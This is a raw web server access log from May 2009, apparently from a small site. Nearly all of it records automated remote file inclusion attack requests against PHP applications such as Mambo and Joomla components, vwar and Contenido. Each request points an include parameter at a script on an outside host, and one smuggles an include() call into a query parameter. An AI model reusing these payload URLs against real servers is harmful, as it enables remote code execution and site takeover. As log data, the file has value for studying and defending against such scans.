216.119.103.12 - - [25/May/2009:03:56:46 -0400] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
216.119.103.12 - - [25/May/2009:03:56:46 -0400] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
210.240.12.4 - - [25/May/2009:03:56:46 -0400] "GET /logs/access_log.Q109051000%20%20//function.inc.php?REX[INCLUDE_PATH]=http://www.van-long.de//components/com_joomlapack/.dat/fx29id.txt??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
88.191.103.144 - - [25/May/2009:03:56:47 -0400] "GET /logs/error_log.Q108082500//modules/vwar/admin/admin.php?vwar_root=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 253 "-" "libwww-perl/5.825"
88.191.103.144 - - [25/May/2009:03:56:47 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 227 "-" "libwww-perl/5.825"
88.191.103.144 - - [25/May/2009:03:56:48 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 232 "-" "libwww-perl/5.825"
194.214.239.83 - - [25/May/2009:03:56:52 -0400] "GET /logs/error_log.Q109042900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight='.include($_GET%5Ba%5D),exit.'&a=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.0" 404 234 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
88.191.103.144 - - [25/May/2009:03:56:52 -0400] "GET /logs/error_log.Q108050700//modules/vwar/admin/admin.php?vwar_root=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 253 "-" "libwww-perl/5.825"
88.191.103.144 - - [25/May/2009:03:56:52 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 227 "-" "libwww-perl/5.825"
88.191.103.144 - - [25/May/2009:03:56:53 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 232 "-" "libwww-perl/5.825"
216.119.103.12 - - [25/May/2009:03:56:54 -0400] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
216.119.103.12 - - [25/May/2009:03:56:54 -0400] "GET /logs/access_log.Q109051100%20%20/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 295 "-" "Mozilla/5.0"
216.119.103.12 - - [25/May/2009:03:56:54 -0400] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
88.84.128.40 - - [25/May/2009:03:57:13 -0400] "GET /logs/error_log.Q108082500//modules/vwar/admin/admin.php?vwar_root=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 253 "-" "libwww-perl/5.803"
88.84.128.40 - - [25/May/2009:03:57:13 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 227 "-" "libwww-perl/5.803"
88.84.128.40 - - [25/May/2009:03:57:14 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 232 "-" "libwww-perl/5.803"
88.191.103.144 - - [25/May/2009:03:57:15 -0400] "GET /logs/error_log.Q108053100//modules/vwar/admin/admin.php?vwar_root=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 253 "-" "libwww-perl/5.825"
67.212.165.114 - - [25/May/2009:03:57:50 -0400] "GET /start.php?page=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
67.212.165.114 - - [25/May/2009:03:57:50 -0400] "GET /logs/start.php?page=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
67.212.165.114 - - [25/May/2009:03:57:55 -0400] "GET /logs/access_log.Q109031600%20%20/start.php?page=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
216.176.196.171 - - [25/May/2009:03:58:15 -0400] "GET /logs/access_log.Q109051800//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 277 "-" "libwww-perl/5.79"
216.176.196.171 - - [25/May/2009:03:58:36 -0400] "GET /logs/access_log.Q109051800//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 277 "-" "libwww-perl/5.79"
88.84.128.40 - - [25/May/2009:03:59:33 -0400] "GET /logs/error_log.Q108050700//modules/vwar/admin/admin.php?vwar_root=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 253 "-" "libwww-perl/5.803"
88.84.128.40 - - [25/May/2009:03:59:33 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 227 "-" "libwww-perl/5.803"
88.84.128.40 - - [25/May/2009:03:59:33 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 232 "-" "libwww-perl/5.803"
88.84.128.40 - - [25/May/2009:03:59:39 -0400] "GET /logs/error_log.Q108053100//modules/vwar/admin/admin.php?vwar_root=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 253 "-" "libwww-perl/5.803"
216.119.103.12 - - [25/May/2009:04:00:12 -0400] "GET /logs/access_log.Q109051100/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
216.119.103.12 - - [25/May/2009:04:00:19 -0400] "GET /logs/access_log.Q109051100/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
209.59.12.99 - - [25/May/2009:04:02:17 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
220.181.7.97 - - [25/May/2009:04:02:31 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
123.143.98.5 - - [25/May/2009:04:02:58 -0400] "GET /logs/?sourcedir=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt??? HTTP/1.1" 200 2758 "-" "libwww-perl/5.805"
123.143.98.5 - - [25/May/2009:04:02:58 -0400] "GET /?sourcedir=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt??? HTTP/1.1" 200 409 "-" "libwww-perl/5.805"
123.143.98.5 - - [25/May/2009:04:02:58 -0400] "GET /logs/access_log.Q108091100/?sourcedir=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
123.143.98.5 - - [25/May/2009:04:03:04 -0400] "GET /logs/access_log.Q108091100/?sourcedir=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
123.143.98.5 - - [25/May/2009:04:03:04 -0400] "GET /?sourcedir=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt??? HTTP/1.1" 200 409 "-" "libwww-perl/5.805"
123.143.98.5 - - [25/May/2009:04:03:04 -0400] "GET /logs/?sourcedir=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt??? HTTP/1.1" 200 2758 "-" "libwww-perl/5.805"
123.143.98.5 - - [25/May/2009:04:03:08 -0400] "GET /logs/?sourcedir=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt??? HTTP/1.1" 200 2758 "-" "libwww-perl/5.805"
123.143.98.5 - - [25/May/2009:04:03:08 -0400] "GET /logs/access_log.Q108091100/?sourcedir=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
123.143.98.5 - - [25/May/2009:04:03:08 -0400] "GET /?sourcedir=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt??? HTTP/1.1" 200 409 "-" "libwww-perl/5.805"
123.143.98.5 - - [25/May/2009:04:03:18 -0400] "GET /logs/access_log.Q108061800/?sourcedir=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
123.143.98.5 - - [25/May/2009:04:03:24 -0400] "GET /logs/access_log.Q108061800/?sourcedir=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
123.143.98.5 - - [25/May/2009:04:03:29 -0400] "GET /logs/access_log.Q108061800/?sourcedir=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
123.125.64.38 - - [25/May/2009:04:03:32 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
208.64.202.134 - - [25/May/2009:04:03:37 -0400] "GET /logs/access_log.Q109051800//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
212.227.96.166 - - [25/May/2009:04:03:43 -0400] "GET /logs/access_log.Q108052200/?sourcedir=http://www.klean-tech.com.tw/UserFiles/copyright.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
212.227.96.166 - - [25/May/2009:04:03:43 -0400] "GET /logs/?sourcedir=http://www.klean-tech.com.tw/UserFiles/copyright.txt???? HTTP/1.1" 200 2758 "-" "Mozilla/5.0"
212.227.96.166 - - [25/May/2009:04:03:43 -0400] "GET /?sourcedir=http://www.klean-tech.com.tw/UserFiles/copyright.txt???? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
66.249.72.114 - - [25/May/2009:04:03:49 -0400] "GET /cgi-bin/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L0044F74B09A0C400F2DB049+WSEQ(S0060):1+OUITEM(A0200):05560401 HTTP/1.1" 200 27013 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
208.64.202.134 - - [25/May/2009:04:04:11 -0400] "GET /logs/error_log.Q108103000//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
65.55.105.244 - - [25/May/2009:04:05:00 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.105.244 - - [25/May/2009:04:05:01 -0400] "GET / HTTP/1.1" 200 409 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
216.151.134.36 - - [25/May/2009:04:05:42 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
216.151.134.36 - - [25/May/2009:04:05:42 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
216.151.134.36 - - [25/May/2009:04:05:42 -0400] "GET /logs/access_log.Q108121400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
87.106.7.58 - - [25/May/2009:04:05:53 -0400] "GET /logs/access_log.Q108091400%20%20//?error=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
87.106.7.58 - - [25/May/2009:04:05:53 -0400] "GET //?error=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
87.106.7.58 - - [25/May/2009:04:05:53 -0400] "GET /logs//?error=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 200 2763 "-" "Mozilla/5.0"
87.106.7.58 - - [25/May/2009:04:05:55 -0400] "GET //?error=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
87.106.7.58 - - [25/May/2009:04:05:55 -0400] "GET /logs/access_log.Q108091400%20%20//?error=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
87.106.7.58 - - [25/May/2009:04:05:55 -0400] "GET /logs//?error=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 200 2763 "-" "Mozilla/5.0"
88.191.103.144 - - [25/May/2009:04:06:01 -0400] "GET /logs/error_log.Q108053100//modules/vwar/admin/admin.php?vwar_root=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 253 "-" "libwww-perl/5.825"
212.227.96.166 - - [25/May/2009:04:06:01 -0400] "GET /logs/?sourcedir=http://www.klean-tech.com.tw/UserFiles/copyright.txt???? HTTP/1.1" 200 2758 "-" "Mozilla/5.0"
212.227.96.166 - - [25/May/2009:04:06:01 -0400] "GET /?sourcedir=http://www.klean-tech.com.tw/UserFiles/copyright.txt???? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
212.227.96.166 - - [25/May/2009:04:06:01 -0400] "GET /logs/error_log.Q108090500%20%20/?sourcedir=http://www.klean-tech.com.tw/UserFiles/copyright.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
207.182.143.50 - - [25/May/2009:04:06:12 -0400] "GET //index2.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
207.182.143.50 - - [25/May/2009:04:06:12 -0400] "GET /logs//index2.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
207.182.143.50 - - [25/May/2009:04:06:12 -0400] "GET /logs/access_log.Q108120400//index2.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
207.182.143.50 - - [25/May/2009:04:06:14 -0400] "GET /logs/access_log.Q108091400//index2.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
207.182.143.50 - - [25/May/2009:04:06:20 -0400] "GET //index2.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
207.182.143.50 - - [25/May/2009:04:06:20 -0400] "GET /logs//index2.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
210.240.12.4 - - [25/May/2009:04:06:21 -0400] "GET /logs/error_log.Q109050500//function.inc.php?REX[INCLUDE_PATH]=http://www.van-long.de//components/com_joomlapack/.dat/fx29id.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
207.182.143.50 - - [25/May/2009:04:06:21 -0400] "GET /logs/access_log.Q108120400%20%20//index2.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
207.182.143.50 - - [25/May/2009:04:06:26 -0400] "GET /logs/access_log.Q108091400%20%20//index2.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
87.106.7.58 - - [25/May/2009:04:06:33 -0400] "GET //?error=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
87.106.7.58 - - [25/May/2009:04:06:33 -0400] "GET /logs/access_log.Q108091400%20%20//?error=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
87.106.7.58 - - [25/May/2009:04:06:33 -0400] "GET /logs//?error=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 200 2763 "-" "Mozilla/5.0"
210.240.12.4 - - [25/May/2009:04:06:42 -0400] "GET /logs/access_log.Q109051000//function.inc.php?REX[INCLUDE_PATH]=http://www.van-long.de//components/com_joomlapack/.dat/fx29id.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
77.222.40.40 - - [25/May/2009:04:06:56 -0400] "GET //?error=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
77.222.40.40 - - [25/May/2009:04:06:56 -0400] "GET /logs//?error=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 200 2763 "-" "Mozilla/5.0"
77.222.40.40 - - [25/May/2009:04:06:56 -0400] "GET /logs/access_log.Q108091400%20%20//?error=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
77.222.40.40 - - [25/May/2009:04:07:01 -0400] "GET //?error=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
77.222.40.40 - - [25/May/2009:04:07:01 -0400] "GET /logs//?error=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 200 2763 "-" "Mozilla/5.0"
77.222.40.40 - - [25/May/2009:04:07:01 -0400] "GET /logs/access_log.Q108091400%20%20//?error=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
77.222.40.40 - - [25/May/2009:04:07:09 -0400] "GET //?error=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
77.222.40.40 - - [25/May/2009:04:07:09 -0400] "GET /logs/access_log.Q108091400%20%20//?error=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
77.222.40.40 - - [25/May/2009:04:07:09 -0400] "GET /logs//?error=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 200 2763 "-" "Mozilla/5.0"
58.227.193.198 - - [25/May/2009:04:07:11 -0400] "GET /logs/access_log.Q108121400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
58.227.193.198 - - [25/May/2009:04:07:11 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
58.227.193.198 - - [25/May/2009:04:07:11 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
77.222.40.40 - - [25/May/2009:04:07:13 -0400] "GET //?error=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
77.222.40.40 - - [25/May/2009:04:07:13 -0400] "GET /logs//?error=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 200 2763 "-" "Mozilla/5.0"
77.222.40.40 - - [25/May/2009:04:07:13 -0400] "GET /logs/access_log.Q108091400%20%20//?error=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
91.206.183.148 - - [25/May/2009:04:07:15 -0400] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
91.206.183.148 - - [25/May/2009:04:07:15 -0400] "GET /logs/access_log.Q109050900%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
91.206.183.148 - - [25/May/2009:04:07:15 -0400] "GET /logs/access_log.Q108091400%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
91.206.183.148 - - [25/May/2009:04:07:15 -0400] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
209.59.12.99 - - [25/May/2009:04:07:18 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
58.227.193.198 - - [25/May/2009:04:07:20 -0400] "GET /logs/access_log.Q108072800//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
88.84.128.40 - - [25/May/2009:04:07:34 -0400] "GET /logs/error_log.Q108053100//modules/vwar/admin/admin.php?vwar_root=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 253 "-" "libwww-perl/5.803"
87.106.7.58 - - [25/May/2009:04:07:36 -0400] "GET /logs/access_log.Q109051800%20%20//?error=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
87.106.7.58 - - [25/May/2009:04:07:41 -0400] "GET /logs/access_log.Q109051800%20%20//?error=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
67.212.165.114 - - [25/May/2009:04:08:05 -0400] "GET /index.php?stranica=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
67.212.165.114 - - [25/May/2009:04:08:05 -0400] "GET /logs/index.php?stranica=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
88.191.103.144 - - [25/May/2009:04:08:05 -0400] "GET /logs/access_log.Q108082500//modules/vwar/admin/admin.php?vwar_root=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.825"
67.212.165.114 - - [25/May/2009:04:08:13 -0400] "GET /index.php?stranica=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
67.212.165.114 - - [25/May/2009:04:08:13 -0400] "GET /logs/index.php?stranica=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
88.191.103.144 - - [25/May/2009:04:08:17 -0400] "GET /logs/error_log.Q108050700//modules/vwar/admin/admin.php?vwar_root=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 253 "-" "libwww-perl/5.825"
87.106.7.58 - - [25/May/2009:04:08:18 -0400] "GET /logs/access_log.Q109051800%20%20//?error=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
69.237.82.158 - - [25/May/2009:04:08:19 -0400] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
69.237.82.158 - - [25/May/2009:04:08:19 -0400] "GET /logs/access_log.Q109050900%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
195.34.78.110 - - [25/May/2009:04:08:20 -0400] "GET /logs/error_log.Q108102500//s_loadenv.inc.php?DOCUMENT_ROOT=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
195.34.78.110 - - [25/May/2009:04:08:20 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
195.34.78.110 - - [25/May/2009:04:08:20 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
69.237.82.158 - - [25/May/2009:04:08:23 -0400] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
69.237.82.158 - - [25/May/2009:04:08:24 -0400] "GET /logs/access_log.Q108091400%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
67.212.165.114 - - [25/May/2009:04:08:25 -0400] "GET /logs/index.php?stranica=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
67.212.165.114 - - [25/May/2009:04:08:25 -0400] "GET /index.php?stranica=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
66.249.72.114 - - [25/May/2009:04:08:25 -0400] "GET /images/items/5096000_FULL.JPG HTTP/1.1" 200 12686 "-" "Googlebot-Image/1.0"
195.34.78.110 - - [25/May/2009:04:08:32 -0400] "GET /logs/error_log.Q108100400//s_loadenv.inc.php?DOCUMENT_ROOT=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
91.206.183.148 - - [25/May/2009:04:08:44 -0400] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
195.34.78.110 - - [25/May/2009:04:08:47 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
195.34.78.110 - - [25/May/2009:04:08:47 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
195.34.78.110 - - [25/May/2009:04:08:47 -0400] "GET /logs/error_log.Q108102500//s_loadenv.inc.php?DOCUMENT_ROOT=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
91.206.183.148 - - [25/May/2009:04:08:48 -0400] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
91.206.183.148 - - [25/May/2009:04:08:50 -0400] "GET /logs/access_log.Q109050900/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
91.206.183.148 - - [25/May/2009:04:08:50 -0400] "GET /logs/access_log.Q108091400/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
195.34.78.110 - - [25/May/2009:04:08:58 -0400] "GET /logs/error_log.Q108100400//s_loadenv.inc.php?DOCUMENT_ROOT=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
67.212.165.114 - - [25/May/2009:04:09:02 -0400] "GET /index.php?stranica=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
67.212.165.114 - - [25/May/2009:04:09:02 -0400] "GET /logs/index.php?stranica=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
77.222.40.40 - - [25/May/2009:04:09:06 -0400] "GET /logs/access_log.Q109051800%20%20//?error=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
